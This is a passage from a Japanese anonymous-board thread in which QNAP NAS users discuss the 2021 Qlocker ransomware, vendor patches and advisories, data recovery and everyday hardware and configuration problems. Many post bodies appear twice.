な脆弱性の修正には及んでない気がするな。
を/mnt/HDA_ROOT/home/httpd/cgi-bin以下にあるcgiプログラムを起動することで
実行してるらしい。そのため、QNAPのwebサーバーのコマンドインジェクションの脆弱性
を付いて内部に侵入した場合、Admin権限がなくてもcgiプログラムを実行することで
Admin権限のコマンドが実行可能だと言ってる。これが正しければ、QNAPが脆弱性があ
るのは分かったが、修正には及んでないと答えたのはある意味、わかるというか、多分、
そう簡単には修正できるような脆弱性じゃなかったのかもね。というか、QNAPは根本的
な脆弱性の修正には及んでない気がするな。
746不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/09(日) 20:57:17.21ID:G9Nqphv10 これって4/19に対応済みって奴じゃないの
747不明なデバイスさん (ワッチョイ e6ab-kzyh)
2021/05/09(日) 21:05:22.88ID:U5/0sLAI0 他にまともなNASってどこのやつ?
748不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/09(日) 21:07:12.63ID:h0a4wAMc0 ソースを見に行ったらターミナルの様子に見覚えのある記事だった
なんでここに触れないんだろう
> Update April 19, 2021: QNAP has released security advisories
> for both vulnerabilities along with new firmware releases.
> We recommend all QNAP users urgently update their firmware.
なんでここに触れないんだろう
> Update April 19, 2021: QNAP has released security advisories
> for both vulnerabilities along with new firmware releases.
> We recommend all QNAP users urgently update their firmware.
749不明なデバイスさん (ワッチョイ 6a82-dmY4)
2021/05/09(日) 21:37:26.03ID:eCfDV0zO0 ネットから見えるようにしなきゃ良いんじゃね?
750不明なデバイスさん (ワッチョイ cb68-UtBM)
2021/05/09(日) 21:53:05.46ID:Ihd4IRSA0 ts-453beです
最初に入ってるメモリが4GBの2Rx4なんだけど、
空きスロットに1Rx8な4GB食うかな?
最初に入ってるメモリが4GBの2Rx4なんだけど、
空きスロットに1Rx8な4GB食うかな?
751不明なデバイスさん (ワッチョイ cb68-UtBM)
2021/05/09(日) 22:13:45.04ID:Ihd4IRSA0 >>713
遅レスだけど、プライマリDNSを勝手に127.0.0.1に変えられてない?
遅レスだけど、プライマリDNSを勝手に127.0.0.1に変えられてない?
752不明なデバイスさん (ワッチョイ 0b52-/boy)
2021/05/09(日) 22:40:30.53ID:kmcteNmd0 ウチは被害受けてないし、公開もしてないから大丈夫だと思い放置してたが、安心できなさそうだな。
ローカル運用にした。
ローカル運用にした。
753不明なデバイスさん (ワッチョイ fb48-iv4Q)
2021/05/09(日) 23:35:41.74ID:gSHLZKYB0755不明なデバイスさん (ワッチョイ 666d-nm5w)
2021/05/10(月) 06:57:54.36ID:+FVOgyHS0 前みたいにやすくもないしやる気ない会社って感じ
756不明なデバイスさん (スッップ Sd8a-Y7F+)
2021/05/10(月) 08:47:49.15ID:DNgZx5Ypd うちはSynologyのルーターだから大丈夫なのかな。
RT2600acはVPNが優秀だから後継機出してほしい
RT2600acはVPNが優秀だから後継機出してほしい
757不明なデバイスさん (ワッチョイ 0b6f-NWox)
2021/05/10(月) 09:04:13.73ID:G11DtM0F0759不明なデバイスさん (ワッチョイ 2602-Gc5h)
2021/05/10(月) 10:36:42.64ID:EXkhGBU10 JCOMの光は自由にルータ選べない上にVPNも使えないから不便だな
LinuxボックスベースのVPNアプライアンスを設置してるけど
LinuxボックスベースのVPNアプライアンスを設置してるけど
761不明なデバイスさん (ワッチョイ be9b-gUNg)
2021/05/10(月) 18:44:19.43ID:c9jaiF510 >>714,>>721
試したけどダメだった
でググって解決した。以下に書くけどLINUXとかCLIとかチンプンカンプンの私が書いてるので突っ込みがあったら教えてほしい
/etc/config/apache/extra/apache-log.conf
を作成(テキストファイル)、1行目に
CustomLog "|/usr/local/apache/bin/rotatelogs -l /share/CACHEDEV1_DATA/適当な共有フォルダ/access_%Y-%m-%d.log 86400" combined
を追加、(rotatelogsという機能を使いログを86400秒(=1日)で分割し、access_年-月-日.logで適当な共有フォルダに保存するというコマンド(多分))
/etc/config/apache/apache.conf
を開き、一番最後の新しい行に
Include /etc/config/apache/extra/apache-log.conf
を追加、
/etc/init.d/Qthttpd.sh restart
でWEBサーバーを再起動
これでネットワークドライブから簡単に見れる場所にログが生成されるようになった
CACHEDEV1_DATAは環境によって違うらしいから適当に探す
私はapache-log.confはメモ帳で作成、apache.confはWinSCPでWindowsにコピーしてメモ帳で編集、それぞれWinSCPで戻し
最後の再起動コマンドだけTera Termでやった(PowerShellでできるらしいけど…)
↓以下参考ページ
https://www.tweaking4all.com/forum/qnap-nas/qnap-enable-apache-logging/
https://www.ikushimo.com/news/2017/03/04.html
試したけどダメだった
でググって解決した。以下に書くけどLINUXとかCLIとかチンプンカンプンの私が書いてるので突っ込みがあったら教えてほしい
/etc/config/apache/extra/apache-log.conf
を作成(テキストファイル)、1行目に
CustomLog "|/usr/local/apache/bin/rotatelogs -l /share/CACHEDEV1_DATA/適当な共有フォルダ/access_%Y-%m-%d.log 86400" combined
を追加、(rotatelogsという機能を使いログを86400秒(=1日)で分割し、access_年-月-日.logで適当な共有フォルダに保存するというコマンド(多分))
/etc/config/apache/apache.conf
を開き、一番最後の新しい行に
Include /etc/config/apache/extra/apache-log.conf
を追加、
/etc/init.d/Qthttpd.sh restart
でWEBサーバーを再起動
これでネットワークドライブから簡単に見れる場所にログが生成されるようになった
CACHEDEV1_DATAは環境によって違うらしいから適当に探す
私はapache-log.confはメモ帳で作成、apache.confはWinSCPでWindowsにコピーしてメモ帳で編集、それぞれWinSCPで戻し
最後の再起動コマンドだけTera Termでやった(PowerShellでできるらしいけど…)
↓以下参考ページ
https://www.tweaking4all.com/forum/qnap-nas/qnap-enable-apache-logging/
https://www.ikushimo.com/news/2017/03/04.html
762不明なデバイスさん (ワッチョイ 1ab7-ziZD)
2021/05/10(月) 19:15:20.32ID:+nd1zOs00763不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/10(月) 19:16:14.22ID:UeCRfFxS0 再起動しても設定は残ってるかな?
764不明なデバイスさん (ワッチョイ d35f-kG12)
2021/05/10(月) 19:33:18.39ID:gUvsYpUY0 みんなNASどこに設置してる?
ウチは8ベイ2台をクローゼット
ウチは8ベイ2台をクローゼット
765不明なデバイスさん (ワッチョイ 3f70-VKOh)
2021/05/10(月) 19:46:06.80ID:pqU/+Qlu0 >>762
音はどう?
音はどう?
767不明なデバイスさん (ワッチョイ be9b-gUNg)
2021/05/10(月) 20:36:40.24ID:c9jaiF510 >>763
NASしても残ってるよ
NASしても残ってるよ
768不明なデバイスさん (ワンミングク MM36-ziZD)
2021/05/10(月) 21:14:22.69ID:q72Cv3YhM769不明なデバイスさん (ワッチョイ cb68-UtBM)
2021/05/10(月) 21:17:09.58ID:5u1n+gWS0 きのうnasからsmedioのアプリ買ったんだけど、
このライセンスってnasに紐付けなん?
ちなqnap垢は作ってない
このライセンスってnasに紐付けなん?
ちなqnap垢は作ってない
770不明なデバイスさん (ブーイモ MMd6-Fod4)
2021/05/10(月) 21:51:42.87ID:7v+x0uIxM 自分の親しい人が亡くなったあとにスマホから見えてるコンテンツ容量の軽く10倍は搭載してそうなNASが残されてて管理者権限不明だったらどうすりゃいいんだろ。
逆にどういうカムフラコンテンツを残しておけばそれ以上は探られずに廃棄してもらえるだろうか。
パスワードは頭の中だけにしないとgoogleの二要素認証は死体の指でも指紋認証突破されるかも知らんしな。
逆にどういうカムフラコンテンツを残しておけばそれ以上は探られずに廃棄してもらえるだろうか。
パスワードは頭の中だけにしないとgoogleの二要素認証は死体の指でも指紋認証突破されるかも知らんしな。
771不明なデバイスさん (ワッチョイ 3ebb-TZsp)
2021/05/10(月) 22:12:56.15ID:MUkrbHXN0 ヤバいね
過去24時間に19167パケットへのアクセスが拒否されました
過去24時間に19167パケットへのアクセスが拒否されました
772不明なデバイスさん (ワッチョイ be9b-gUNg)
2021/05/10(月) 22:18:31.39ID:c9jaiF510773不明なデバイスさん (ワッチョイ cb68-UtBM)
2021/05/10(月) 22:43:58.94ID:5u1n+gWS0 >>770
スマホやpcのブラウザにパス記憶されてるとかありそう
スマホやpcのブラウザにパス記憶されてるとかありそう
775不明なデバイスさん (ワッチョイ 0bda-ZiiA)
2021/05/10(月) 23:19:15.40ID:OLVsJhYU0 >>762
先月中頃まで、Synologyから乗り換えるつもりマンマンだったが、すっかり熱がさめた
やっぱりQNAPはダメだわ
大してネットニュースにならないのも
ユーザー少ない証拠だよなあ
Synologyなら影響が倍以上あるだろう
先月中頃まで、Synologyから乗り換えるつもりマンマンだったが、すっかり熱がさめた
やっぱりQNAPはダメだわ
大してネットニュースにならないのも
ユーザー少ない証拠だよなあ
Synologyなら影響が倍以上あるだろう
776不明なデバイスさん (アウアウウー Sa1f-K+t/)
2021/05/10(月) 23:25:19.03ID:yWuWJGPea777不明なデバイスさん (ワッチョイ d35f-jjtP)
2021/05/10(月) 23:25:34.25ID:+QH5jHYP0 いや、篠もadmin攻撃の踏み台にされてたじゃん
アクセスしてきたアドレスにポートしてしてみたらDSだったとかで
アクセスしてきたアドレスにポートしてしてみたらDSだったとかで
778不明なデバイスさん (ワッチョイ 3ebb-ly9G)
2021/05/10(月) 23:25:40.98ID:Xq7X7cX+0 >>770
iPhoneの中にパスワード全部閉まっとけ。火葬前に無理矢理目を開けてとかしないと、解除できない。
iPhoneの中にパスワード全部閉まっとけ。火葬前に無理矢理目を開けてとかしないと、解除できない。
779不明なデバイスさん (ワッチョイ d35f-boCe)
2021/05/11(火) 00:18:00.02ID:OQb818I80 >>770
俺は妻に必要なフォルダのみアクセス可能な一般アカウント与えてる。どうせ俺が死んだところで必要になるのはデータだけだし。
俺は妻に必要なフォルダのみアクセス可能な一般アカウント与えてる。どうせ俺が死んだところで必要になるのはデータだけだし。
782不明なデバイスさん (ワッチョイ 2615-jSKx)
2021/05/11(火) 05:56:43.34ID:JTIBMtXp0 qufirewallで1時間に3000パケットアクセス拒否の履歴あるんだけどこれってやばいの?
783不明なデバイスさん (ワッチョイ 1ab7-Vg3a)
2021/05/11(火) 06:33:23.21ID:bpCV3waI0 パケット捕捉モードにしてないとどこから来たのか何にアクセスしたのか分からんファイアーウォールなのがクソ
784不明なデバイスさん (スププ Sd8a-nm5w)
2021/05/11(火) 08:58:29.85ID:Gp4snw6Hd785不明なデバイスさん (ワッチョイ a6cb-sblG)
2021/05/11(火) 10:13:54.87ID:MBzcap9h0 SASカードなんだけどQNAP純正でなく9300-8eみたいなコントローラーが同じもので代替試したことある人いないかな?ファーム違いだとダメか知りたい。
786不明なデバイスさん (JP 0H5a-gUNg)
2021/05/11(火) 11:21:13.46ID:wCxYg0I2H >>775
webメディアはqnapから機材提供されて記事書かせてもらってるからな
webメディアはqnapから機材提供されて記事書かせてもらってるからな
787不明なデバイスさん (ワッチョイ cf68-UtBM)
2021/05/11(火) 13:28:35.45ID:C7wpS3CJ0 旧機種でメモリ最大3GBってのは32bitOSって思っていいの?
789不明なデバイスさん (ワッチョイ 1a68-UtBM)
2021/05/11(火) 16:46:40.75ID:4BGFHBIL0790不明なデバイスさん (ワッチョイ cf3d-Fod4)
2021/05/11(火) 19:12:56.00ID:jbVrkkQJ0 中古ならiodataのHDL-Z4WSのts459pro化で勝負だ。
791不明なデバイスさん (ワッチョイ d35f-krZt)
2021/05/11(火) 22:19:11.27ID:E1injd3l0 >>541
レス遅れて申し訳ない。
こちらの環境はbuffalo WSR5400AX6 ファームウェア1.01(同じ!)
ドコモ光 GMO V6プラス
QNAP TS-251DとQNAP TS-230
QNAP側の設定はV6プラスの関係上、外部からアクセスするために割り当てポートを色々指定したり細々設定してた。
上に書いてあるBuffaloのルーターに買い替えた途端にIpv6通信のみになったのでシンプルにルーターを疑ったが、
ログを追っかけて症状の発生の仕方に違和感を感じて怪しい機器を個別に繋いで調べていくとQNAP(両機器いずれも)が
悪さしてることに気づく。
試しにQNAPのIPV6を無効にしたところうまくいったがQTSの更新を機に同様の事象が再度発生。
色々やってみたけど解決できず、IOとELECOM試したけどダメだったのでNEC「型番:PA-WX3000HP」
を試したところうまくいった。
まだやってないこととして、QNAPでシステムリセット(or高度なリセット)やったり、プロバイダに
配信再設定してもらうことで別のIP割り振ってもらったりとかがあったけど一旦直ってるので解決としてます。
レス遅れて申し訳ない。
こちらの環境はbuffalo WSR5400AX6 ファームウェア1.01(同じ!)
ドコモ光 GMO V6プラス
QNAP TS-251DとQNAP TS-230
QNAP側の設定はV6プラスの関係上、外部からアクセスするために割り当てポートを色々指定したり細々設定してた。
上に書いてあるBuffaloのルーターに買い替えた途端にIpv6通信のみになったのでシンプルにルーターを疑ったが、
ログを追っかけて症状の発生の仕方に違和感を感じて怪しい機器を個別に繋いで調べていくとQNAP(両機器いずれも)が
悪さしてることに気づく。
試しにQNAPのIPV6を無効にしたところうまくいったがQTSの更新を機に同様の事象が再度発生。
色々やってみたけど解決できず、IOとELECOM試したけどダメだったのでNEC「型番:PA-WX3000HP」
を試したところうまくいった。
まだやってないこととして、QNAPでシステムリセット(or高度なリセット)やったり、プロバイダに
配信再設定してもらうことで別のIP割り振ってもらったりとかがあったけど一旦直ってるので解決としてます。
792不明なデバイスさん (ワッチョイ 0bf1-jjtP)
2021/05/12(水) 08:08:08.90ID:oh5qMJC80 ちょっとおしえてほしい。
いまQTSのGeForceでのハードウェアトランスコードって何かトラブル出てる?
TS673Aに1050Ti挿してTSファイルをMP4化させてるんだけど、
最近処理が遅いなぁと思って確認してみたら、どうやらCPUでトランスコードしてる状態のよう。
GPU自体は認識しているし、マルチメディアコンソール上でもGPUトランスコードの表示は出ているが
実際にトランスコードを始めるとCPU負荷が大きく上がる状態。
また、GPUのメモリ量や負荷、温度などが0表示でモニタ出来てない状態。
壊れたんなら素直にVGAカードを買い替えればいいんだけど、
念のためポチる前にシステム的なトラブルの話でも無いかなと思った次第。
ランサムウェア関連で慌ててシステム更新しちゃったから
どこを更新しておかしくなったのかもうわからなくなってしまった。
GeForceのドライバも更新したのが悪かったんかなぁ。
ランサムウェアの少し前にcayinのセットアップした時には
キッチリGPU負荷が上がったことを確認したんだけど。
いまQTSのGeForceでのハードウェアトランスコードって何かトラブル出てる?
TS673Aに1050Ti挿してTSファイルをMP4化させてるんだけど、
最近処理が遅いなぁと思って確認してみたら、どうやらCPUでトランスコードしてる状態のよう。
GPU自体は認識しているし、マルチメディアコンソール上でもGPUトランスコードの表示は出ているが
実際にトランスコードを始めるとCPU負荷が大きく上がる状態。
また、GPUのメモリ量や負荷、温度などが0表示でモニタ出来てない状態。
壊れたんなら素直にVGAカードを買い替えればいいんだけど、
念のためポチる前にシステム的なトラブルの話でも無いかなと思った次第。
ランサムウェア関連で慌ててシステム更新しちゃったから
どこを更新しておかしくなったのかもうわからなくなってしまった。
GeForceのドライバも更新したのが悪かったんかなぁ。
ランサムウェアの少し前にcayinのセットアップした時には
キッチリGPU負荷が上がったことを確認したんだけど。
793不明なデバイスさん (アウアウクー MM73-CKlh)
2021/05/12(水) 08:48:20.40ID:U1x+LdCKM 7zのパスワード分からんし、photorec使うことにした
794不明なデバイスさん (ワッチョイ ca8b-C7Xb)
2021/05/12(水) 10:47:56.74ID:iq4AZ8mp0 QNAP CLUBのところにいくつかQlockerのデータ復旧策の投稿あるね。
海外の人が作ったプログラムのやつとか、ほとんどのデータ回復できたってあるけどホントかな?
海外の人が作ったプログラムのやつとか、ほとんどのデータ回復できたってあるけどホントかな?
795不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/12(水) 12:00:17.99ID:ZqS/7EVw0 >>792
関係ないとは思うけど、Video Stationでトランスコード再生しようとするとマルチメディアコンソールの設定で
各ユーザごとにトランスコードを許可しないといけない、アプリを再インストールすると許可のチェックが外れる
関係ないとは思うけど、Video Stationでトランスコード再生しようとするとマルチメディアコンソールの設定で
各ユーザごとにトランスコードを許可しないといけない、アプリを再インストールすると許可のチェックが外れる
796不明なデバイスさん (ワッチョイ 9f5f-rnKu)
2021/05/12(水) 16:36:30.96ID:Q8RgxVNV0 /usr/local/sbin/7z を消すか、警告メール送るプログラムに置き換えておけば良さそう
実行者を遡って追跡できたらもっと良いんだけど
実行者を遡って追跡できたらもっと良いんだけど
797不明なデバイスさん (ワッチョイ 6a79-7ir8)
2021/05/12(水) 17:03:16.89ID:3lnnawZu0 質問です
2〜5人で共有アクセスするなら、QuTS hero(ZFS)よりQTS(EXT4)の方がいいのでしょうか?
利用されている(された)方の意見を伺いたいです。
特にシステムのCPU使用率・騒音変化等。
現在 TVS-873e QTSにて運用中。サブの869Proが限界に来たんで交換。
2〜5人で共有アクセスするなら、QuTS hero(ZFS)よりQTS(EXT4)の方がいいのでしょうか?
利用されている(された)方の意見を伺いたいです。
特にシステムのCPU使用率・騒音変化等。
現在 TVS-873e QTSにて運用中。サブの869Proが限界に来たんで交換。
798不明なデバイスさん (ワッチョイ 0bbb-dxvU)
2021/05/12(水) 18:38:11.59ID:fORJjXSg0 >>793
QNAP CLUBにあるブログだと、フォルダ構造含めて回復できるみたいね。
filerestoreってツールがいるみたいだけど。
7zのヘッダー情報がパスワードなしで参照できるなら確かにできるかもねーと思った。
QNAP CLUBにあるブログだと、フォルダ構造含めて回復できるみたいね。
filerestoreってツールがいるみたいだけど。
7zのヘッダー情報がパスワードなしで参照できるなら確かにできるかもねーと思った。
799不明なデバイスさん (ワッチョイ 0bf1-jjtP)
2021/05/12(水) 19:01:37.43ID:oh5qMJC80 >>795
ありがとう。
確認してみたけど、マルチメディアコンソールから参照できるVideostationの権限は該当ユーザにも許可されたた。
一応adminでログイオンしてもGPUがうまく動いて見えないのも確認した。
GPUは今高いから買いなおしたくないんだけど、
とりあえず生存確認としてPCに差し替えて試してみることにする。
ありがとう。
確認してみたけど、マルチメディアコンソールから参照できるVideostationの権限は該当ユーザにも許可されたた。
一応adminでログイオンしてもGPUがうまく動いて見えないのも確認した。
GPUは今高いから買いなおしたくないんだけど、
とりあえず生存確認としてPCに差し替えて試してみることにする。
800不明なデバイスさん (ワッチョイ 2e02-sblG)
2021/05/12(水) 19:51:13.34ID:vp0fmDsU0801不明なデバイスさん (ワッチョイ 2e02-sblG)
2021/05/12(水) 20:05:20.02ID:vp0fmDsU0 ねえnasにsshして/usr/local/sbinみたら7zのバイナリの更新タイムスタンプが2021/5/12 2:55とかなってるんだけど…
大丈夫だよな?
大丈夫だよな?
802不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/12(水) 20:06:18.12ID:ks2zjmW+0 /usr/local/sbin/7z 1.4KBぐらいのシェルスクリプト
/usr/local/sbin/7z.orig 本来のバイナリ
Malware Removerさんの暗躍でうちではこうなってる
/usr/local/sbin/7z.orig 本来のバイナリ
Malware Removerさんの暗躍でうちではこうなってる
803不明なデバイスさん (ワッチョイ bb01-r/eH)
2021/05/12(水) 20:07:51.95ID:6X6lxzHL0 QNAPの一番安いやつは
2スロットから4スロットに拡張とかできますか?
2スロットから4スロットに拡張とかできますか?
804不明なデバイスさん (ワッチョイ 2e02-sblG)
2021/05/12(水) 20:12:08.36ID:vp0fmDsU0 特に7z化されたファイルもなく7zのプロセスもなく杞憂だったようだ
取り合えずtgzで固めて変名して移動しておいた
取り合えずtgzで固めて変名して移動しておいた
805不明なデバイスさん (ワッチョイ 2e02-sblG)
2021/05/12(水) 20:13:42.54ID:vp0fmDsU0806不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/12(水) 20:19:18.16ID:ZqS/7EVw0808不明なデバイスさん (ワッチョイ eaad-7oqX)
2021/05/12(水) 20:33:00.94ID:ks2zjmW+0 >>805
別名.tgz に固めて 7z を消しちゃったのなら May 13 02:55 に
また生成されるのかもしれないw
ともあれMalware Removerさんが目を光らせてるようだということで
別名.tgz に固めて 7z を消しちゃったのなら May 13 02:55 に
また生成されるのかもしれないw
ともあれMalware Removerさんが目を光らせてるようだということで
809不明なデバイスさん (テテンテンテン MMe6-2TfS)
2021/05/12(水) 23:32:52.21ID:nSUfdSyfM 勝手に電源が落ちる病が再発してしまった
TVS671にQM2-2S10G1TA挿してNVMe*2で運用、システム系はこちらに入れてる
起動中や起動後でもランダムに電源が落ちる、起動後はそのままだと数時間持つがちょっとでもNAS上で作業すると落ちる(NAS内のファイル操作等)
起動中、起動後問わず落ちる時は正常な手順を踏んで落ちるっぽい、いきなり落ちるのではなく
Qデスクトップ上で突然応答が無くなった後2分ぐらいしてから電源が落ちる
落ちる前はNAS本体のステータスモニタも突然操作できなくなる
再起動しても不正なシャットダウン以外のログは残らない
気温が上がってきたからかなと起動中の温度を見ても全部40度台ぐらいでこれも考えにくい
起動中に落ちることもあるのでアプリ系の原因も考えにくい
電源メモリマザーのどれかでしょうか?
長文すまん
TVS671にQM2-2S10G1TA挿してNVMe*2で運用、システム系はこちらに入れてる
起動中や起動後でもランダムに電源が落ちる、起動後はそのままだと数時間持つがちょっとでもNAS上で作業すると落ちる(NAS内のファイル操作等)
起動中、起動後問わず落ちる時は正常な手順を踏んで落ちるっぽい、いきなり落ちるのではなく
Qデスクトップ上で突然応答が無くなった後2分ぐらいしてから電源が落ちる
落ちる前はNAS本体のステータスモニタも突然操作できなくなる
再起動しても不正なシャットダウン以外のログは残らない
気温が上がってきたからかなと起動中の温度を見ても全部40度台ぐらいでこれも考えにくい
起動中に落ちることもあるのでアプリ系の原因も考えにくい
電源メモリマザーのどれかでしょうか?
長文すまん
810不明なデバイスさん (テテンテンテン MMe6-2TfS)
2021/05/12(水) 23:36:26.42ID:nSUfdSyfM あ、ディスク構成は上記NVMe*2、本体側にキャッシュ用SATASSD*1、NAS用HDD*5、メモリ16GB
前回は半年ぐらい前に同じ症状が出たけど、何度か再起動させてたら安定
今回は外付けUSBディスク挿したらシャットダウン病が再発、もちろん今は取り外して様子見ですが
それでもシャットダウン病が治らず。
前回は半年ぐらい前に同じ症状が出たけど、何度か再起動させてたら安定
今回は外付けUSBディスク挿したらシャットダウン病が再発、もちろん今は取り外して様子見ですが
それでもシャットダウン病が治らず。
813不明なデバイスさん (ワッチョイ 9f5f-74ot)
2021/05/13(木) 01:30:18.84ID:JsgENisw0 >>791
報告Thanks
あの後 動いてるApp全部止めて1個ずつ確認したところ
QTS 4.5.3.1652 (20210428) + DownloadStation 5.7.0184(20210325)
でダメになるのが判明した
NECの型番もありがとう
前使ってたNECのanルーターはインテルwifiと相性悪い時期があったので今回牛にしたのが裏目に出た感じ
WX3000HPで安定するなら買い替えてもいいんだけど
ルーターと無線親機は分けたほうがいいってよく聞くし
WSR5400AX6もAPモードなら安定するらしいんで
安くなってる定番acルーターを有線専用ルーターとして買い増しするのもありかなあとか思ったり
(ヤマハやシスコは流石に買えん)
報告Thanks
あの後 動いてるApp全部止めて1個ずつ確認したところ
QTS 4.5.3.1652 (20210428) + DownloadStation 5.7.0184(20210325)
でダメになるのが判明した
NECの型番もありがとう
前使ってたNECのanルーターはインテルwifiと相性悪い時期があったので今回牛にしたのが裏目に出た感じ
WX3000HPで安定するなら買い替えてもいいんだけど
ルーターと無線親機は分けたほうがいいってよく聞くし
WSR5400AX6もAPモードなら安定するらしいんで
安くなってる定番acルーターを有線専用ルーターとして買い増しするのもありかなあとか思ったり
(ヤマハやシスコは流石に買えん)
814不明なデバイスさん (ワッチョイ 7363-2145)
2021/05/13(木) 01:41:07.03ID:rmiTkpbi0 QNAPから来た5月のニュースレター内容がクソうざいんだが
816不明なデバイスさん (ワッチョイ 7f6e-69F1)
2021/05/13(木) 05:21:22.73ID:m891VyOM0 >>802
マルウェア側書き換えりゃ簡単に突破されそうな対策だな
マルウェア側書き換えりゃ簡単に突破されそうな対策だな
817不明なデバイスさん (ワッチョイ cbca-Fhmz)
2021/05/13(木) 06:49:21.50ID:EPCfY/WW0 Synologyはどうして襲われないの?
818不明なデバイスさん (ワッチョイ 1ab7-Vg3a)
2021/05/13(木) 06:59:40.60ID:+4TW7G6y0 うざい内容書けや糞虫
819不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/13(木) 08:35:18.29ID:VKF22ncg0 まあqnapもsynologyも台湾の会社やしな
ちうごくに占領されたら世界中の情報握られちゃうな
米企業は国策で採算度外視で高機能な安nas出してくれや
ちうごくに占領されたら世界中の情報握られちゃうな
米企業は国策で採算度外視で高機能な安nas出してくれや
820不明なデバイスさん (ワッチョイ ea7f-GXOi)
2021/05/13(木) 08:40:54.41ID:wMaZSy1x0 4.4から4.5にあげたらアクセスログがqulogに変わって、コンピューター名とか記録される情報がかなり少なくなって、アクセス監視に困っている。
4.4に戻すしかない?
4.4に戻すしかない?
821不明なデバイスさん (ワッチョイ 2e02-sblG)
2021/05/13(木) 11:14:35.35ID:4Dc6Zt290822不明なデバイスさん (スップ Sd8a-nm5w)
2021/05/13(木) 11:52:52.55ID:0EksqwB6d QNAP MAS→高機能
QNAPユーザー→ランサムで大騒ぎの低機能ww
QNAPユーザー→ランサムで大騒ぎの低機能ww
823不明なデバイスさん (ワッチョイ a6a2-5QgU)
2021/05/13(木) 12:12:16.60ID:U7wzgMH/0 MAS wwwwwwwwww
825不明なデバイスさん (テテンテンテン MMe6-2TfS)
2021/05/13(木) 12:32:42.80ID:zvckUMTVM >>811-812、815
ありがとうございます。
電源はATX600wの自作用を挿してみたけど、やはり不定期シャットダウンが発生しました。
現在、外付けドライブは使用してません。
NVMeも40度台です。
メモリも疑いましたがチェックした結果問題無し。
モニタに出てこないけど温度測ってる部分があれば疑わしいのですが…
後は拡張カードも疑われます。
ちょっと前にLANカード挿したら不安定になった事がありましたが
LANカードは公式には対応リストに載ってないもの、一方今使用している10GLAN+NVMeは公式対応の純正品
これが使えないと色々困るのですが、挿すスロット変えても駄目なら取り外しでしょうか。
ありがとうございます。
電源はATX600wの自作用を挿してみたけど、やはり不定期シャットダウンが発生しました。
現在、外付けドライブは使用してません。
NVMeも40度台です。
メモリも疑いましたがチェックした結果問題無し。
モニタに出てこないけど温度測ってる部分があれば疑わしいのですが…
後は拡張カードも疑われます。
ちょっと前にLANカード挿したら不安定になった事がありましたが
LANカードは公式には対応リストに載ってないもの、一方今使用している10GLAN+NVMeは公式対応の純正品
これが使えないと色々困るのですが、挿すスロット変えても駄目なら取り外しでしょうか。
826不明なデバイスさん (ワッチョイ ca8b-C7Xb)
2021/05/13(木) 13:07:21.93ID:AClZ+y5V0 7zで暗号化されても、PhotoRecとFilerestoreがあれば復活できるから今回のMalwareはやり方変えてくるかもね
とりあえず今回の被害者はデータ復旧できるだろうけど、他の暗号化手段使われたらまた一からやり直しだな
とりあえず今回の被害者はデータ復旧できるだろうけど、他の暗号化手段使われたらまた一からやり直しだな
827不明なデバイスさん (アウアウウー Sa1f-x/R4)
2021/05/13(木) 14:29:47.63ID:7tqFKOaba 詰パラ・目薬・アイマスク
828不明なデバイスさん (アウアウウー Sa1f-x/R4)
2021/05/13(木) 14:30:30.18ID:7tqFKOaba 誤爆失礼!
829不明なデバイスさん (ブーイモ MM97-ikd9)
2021/05/13(木) 14:35:31.84ID:ARfXkVQ/M >>825
メモリはテストしても問題ないことがあるので(以前過去スレでもあった)メモリの削減とか入れ替えを試してみては。
メモリはテストしても問題ないことがあるので(以前過去スレでもあった)メモリの削減とか入れ替えを試してみては。
830不明なデバイスさん (ワッチョイ 7f6e-69F1)
2021/05/13(木) 15:00:43.54ID:m891VyOM0 >>824
開発者1人のハードコーディングはバレたけど
例えば他にもいるんちゃう?
そっち経由で侵入されてやられてるとかね
このスレにもremover入れてもダメって報告あるけど
まぁガンバレ
日本以外弾いてもjpプロキシ使われたらアウトだし
素直に外部は全閉じでVPN使っとけ
開発者1人のハードコーディングはバレたけど
例えば他にもいるんちゃう?
そっち経由で侵入されてやられてるとかね
このスレにもremover入れてもダメって報告あるけど
まぁガンバレ
日本以外弾いてもjpプロキシ使われたらアウトだし
素直に外部は全閉じでVPN使っとけ
831不明なデバイスさん (テテンテンテン MMe6-uo/I)
2021/05/13(木) 15:10:29.67ID:wv801jiFM TS-230を4台目のNASとして購入した。
QNAPは3台目、他にPCにLinux突っ込んで運用してるからファイルサーバーは5台目だけど、古いAsustorの202TEからTS-228(どちらも4TB)のどちらかを処分するかどうか悩んでる。
QNAPは3台目、他にPCにLinux突っ込んで運用してるからファイルサーバーは5台目だけど、古いAsustorの202TEからTS-228(どちらも4TB)のどちらかを処分するかどうか悩んでる。
832不明なデバイスさん (ワッチョイ 8f68-UtBM)
2021/05/13(木) 18:08:16.91ID:biPhMhUm0 知らんがな
833不明なデバイスさん (ワッチョイ 6a79-7ir8)
2021/05/13(木) 20:09:43.44ID:QlYBnIP70834不明なデバイスさん (ワッチョイ a6cb-sblG)
2021/05/13(木) 20:40:11.98ID:YupLcnrx0 >>833
ありがと。マヂか。USBだとチップ同じでもそんなことあるんか。SASだと余計にシビアそうだな。純正SASカード高いし大人しくUSB接続のエンクロージャにします。
ありがと。マヂか。USBだとチップ同じでもそんなことあるんか。SASだと余計にシビアそうだな。純正SASカード高いし大人しくUSB接続のエンクロージャにします。
835不明なデバイスさん (ワッチョイ cbca-Fhmz)
2021/05/13(木) 20:47:33.59ID:EPCfY/WW0 また、きたよ
マルウェアリムーバーにコマンドインジェクションの脆弱性
Command Injection Vulnerability in Malware Remover
Release date: May 13, 2021
Security ID: QSA-21-16
Severity: Medium
CVE identifier: CVE-2020-36198
Affected products: QNAP NAS running Malware Remover 4.x
マルウェアリムーバーにコマンドインジェクションの脆弱性
Command Injection Vulnerability in Malware Remover
Release date: May 13, 2021
Security ID: QSA-21-16
Severity: Medium
CVE identifier: CVE-2020-36198
Affected products: QNAP NAS running Malware Remover 4.x
836不明なデバイスさん (ワッチョイ 0b36-gV4p)
2021/05/13(木) 20:52:28.23ID:PTmfY6Mn0837不明なデバイスさん (ワッチョイ b782-DjaX)
